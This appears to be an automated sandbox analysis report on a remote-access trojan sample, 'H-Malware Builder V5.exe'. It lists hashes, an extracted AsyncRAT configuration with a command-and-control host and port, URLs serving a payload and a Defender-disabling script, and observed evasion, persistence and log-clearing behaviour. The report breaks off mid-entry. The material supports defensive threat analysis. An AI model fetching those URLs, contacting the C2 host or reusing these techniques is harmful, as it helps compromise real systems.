Analysis
-
max time kernel
105s -
max time network
116s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
04-12-2024 07:47
Static task
static1
Behavioral task
behavioral1
Sample
H-Malware Builder V5.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
H-Malware Builder V5.exe
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral3
Sample
H-Malware Builder V5.exe
Resource
win11-20241007-en
General
-
Target
H-Malware Builder V5.exe
-
Size
407KB
-
MD5
c8f6d76b4ae82978272bde392561c4f4
-
SHA1
80447d36fcf88cc9caa806db53e22d9468cc31ee
-
SHA256
c981ebcf0c0cf857162ae35b9385c22d3198c2ec9ea00e37fcfe74a79eb3510e
-
SHA512
10fa87f050a9ceb658e443317158ef8b1dbaa9e183ec61b5e5e42adb562f7918d996134aba7f0bbad852def4d6b0824c7b9716628b554194d0fd95974de6b2ad
-
SSDEEP
12288:r5p4UNBN3aqeKNoRfwoZrHMBV9EwEcb8+DvtuWUb:r9N3aqPCRooZwBjEhcYcvYWUb
Malware Config
Extracted
https://github.com/MalwareTeam/SecurityHealthService/raw/main/SecurityHealthService.exe
https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat
Extracted
asyncrat
1.0.7
Default
bay-helps.gl.at.ply.gg:36538
DcRatMutex_qwqdanchun
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 1660 created 608 1660 Stub.exe 5 PID 1616 created 4444 1616 svchost.exe 218 -
Async RAT payload 2 IoCs
resource yara_rule behavioral1/files/0x0008000000023cb4-23.dat family_asyncrat behavioral1/memory/1660-302-0x000002496F0D0000-0x000002496F0E2000-memory.dmp family_asyncrat -
Blocklisted process makes network request 2 IoCs
flow pid Process 17 1180 powershell.exe 19 1180 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 35 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3420 powershell.exe 616 powershell.exe 2516 powershell.exe 3904 powershell.exe 2684 powershell.exe 2992 powershell.exe 1416 powershell.exe 2064 powershell.exe 4496 powershell.exe 768 powershell.exe 3228 powershell.exe 684 powershell.exe 3628 powershell.exe 264 powershell.exe 828 powershell.exe 1544 powershell.exe 4396 powershell.exe 2636 powershell.exe 2064 powershell.exe 2940 powershell.exe 1836 powershell.exe 3740 powershell.exe 2560 powershell.exe 4220 powershell.exe 1092 powershell.exe 2328 powershell.exe 2660 powershell.exe 3420 powershell.exe 2256 powershell.exe 2484 powershell.exe 2660 powershell.exe 3600 powershell.exe 4860 powershell.exe 4288 powershell.exe 3900 powershell.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" WaaSMedicAgent.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 36 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation Stub.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe -
Drops startup file 35 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe -
Executes dropped EXE 2 IoCs
pid Process 1660 Stub.exe 4444 H-Malware Builder V5.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx svchost.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\V: svchost.exe File opened (read-only) \??\Y: svchost.exe File opened (read-only) \??\Z: svchost.exe File opened (read-only) \??\G: svchost.exe File opened (read-only) \??\I: svchost.exe File opened (read-only) \??\R: svchost.exe File opened (read-only) \??\U: svchost.exe File opened (read-only) \??\L: svchost.exe File opened (read-only) \??\M: svchost.exe File opened (read-only) \??\S: svchost.exe File opened (read-only) \??\W: svchost.exe File opened (read-only) \??\A: svchost.exe File opened (read-only) \??\H: svchost.exe File opened (read-only) \??\J: svchost.exe File opened (read-only) \??\K: svchost.exe File opened (read-only) \??\O: svchost.exe File opened (read-only) \??\Q: svchost.exe File opened (read-only) \??\T: svchost.exe File opened (read-only) \??\X: svchost.exe File opened (read-only) \??\B: svchost.exe File opened (read-only) \??\E: svchost.exe File opened (read-only) \??\N: svchost.exe File opened (read-only) \??\P: svchost.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 wmiprvse.exe -
Drops file in System32 directory 14 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\System32\Tasks\$77Stub.exe svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D lsass.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1660 set thread context of 4992 1660 Stub.exe 89 -
Drops file in Windows directory 6 IoCs
description ioc Process File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe File opened for modification C:\Windows\Logs\CBS\CBS.log TiWorker.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe -
Checks processor information in registry 2 TTPs 7 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 mousocoreworker.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2437139445-1151884604-3026847218-1000\ValidDeviceId svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000d8c5ae66c44e0548aebe78fbbf17ad21000000000200000000001066000000010000200000004ae05692c1237b9ccb265ebefeb9f7e8de911abb91327e98bbd2f42e26dae63d000000000e8000000002000020000000fdb83bdddd53afd7d31712cb4335a5a649bab3ae9f91abcb5760f4b9766d47d7b0030000664d435690b764577271b8b60f7883d34e9c65d576ef33545cf72c04fa66c383ad9c03950b9a261cd1bf0707b1757339102f2662082a748cd6d6f5ffaadc7b1f12b47ac6798a4e6904d796a3406d83ab26b41d0b28e61062e1924173a45c8eb6832b85ab6824b7617ac40ecb2e80e1373da94d1a381e0a0abd6c3a39322b7f3f3b07c58f63007b5f1906c7da6b4521b723bf9bfefaedff267132b6c298e275b601a1497e7f7784903e5b1b35dbbf183fa18b541dc63fbf624e746d724ca44e60681c5407b55e25d6abb0b4c64f29b5b5a3e87746c48baee4cabcaf81f838b9fcfd5af9a5551187aa389bbdb50802d7762cf6ad726f85812d06dfa60e286beea75111ee52e5f44105cbe28397ca19c179cfa9d968d695073853effab698e81adc4aa0ae8130896fa1d213e8ef0567418cd8dbc27ae0f653956a2faec07a7c99a7ccfda9a71be1811f3a0d9698829f6611196a3da5fe9d445708e7f30c346247e887099ebb83ef4cf3e349cc741d5a253f5e876e9e8c9154ab348765b15a583369098b618f081083864ae0e44ed006315b9e3f3cbbabb13d142efc8e52f36d3ffc71b729484110cc54896fa6da248a80666935e099800a75359786cf56a9c0cdc60ed9febf723361e4e8125030d931d7138bb1bbfd757e0c78c8d71e739061250065373feff05c6904ea728d51176409744199622b0c5257f526cf322bd334059edec11bcfc7ac22c9d63c83ed0f04371db0cb89c80151adea486674f9f6c6fd534324b85708c98b0767c8975fd96a88eda82096186bf8eb2c6542352590991854ef16bd211924fb738ac6b403d887831ddecea5cc0d6041c6d170bbe90a030202f231e557f42d854f9e84f2b146126f3e4db17c497d333d53479ed332924bf08c47f1bb5469851cb45e6407df93684225dd27ea1189456d64cf8b6c24b823f47a08964ee63d6842fe60fac61f685bc38d721227f3d27ad547a430f60de8c840458679bbd45dcc7fc7f6d71c18b530ba6a1a5d40a78d965cc762c5eb154e7f506528c86c285b335a9ccf760bd953748a207d6dbcccb9b44e73bebd32a8230e2096e7c0b8e771b50ff4f62f7292ae21dc03fc919f80b608d3cf71e1ea4f53c219e41786a91764db8c83bcfd99866ed40739a432cccb06a7329b2d72d8f5915840cb3478a3abbdf99675b791a7f53e4f5659ab4297e1c3c47986178aa11e9e804eea86469e29e0b3cb73f9f96ec6d63aa7ed791d1ec7134f9ddbc5763b5c61aaba1d179beea9242cb4b6b844fcc5c49cca5cff4b2f9fe019f939b8b3b5e3cc5cbd39dcba2e1b94943e5e60ba8464cc10e0774000000027c9080628ba83a5c0015f7e85f9d447e0a12e517d6e645bfbe84b86223268636994cfd6519c4cafa2c8cdfa4a54e92fd5b45d5419650afc6dd894695b9712cb mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2437139445-1151884604-3026847218-1000\02qbfqxlevqhmqqd\Reason = "2147780641" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2437139445-1151884604-3026847218-1000\ValidDeviceId = "02jgdlocdvhdhhnb" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02qbfqxlevqhmqqd svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2437139445-1151884604-3026847218-1000\02jgdlocdvhdhhnb\AppIdList = "{AFDA72BF-3409-413A-B54E-2AB8D66A7826};" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Set value (str) 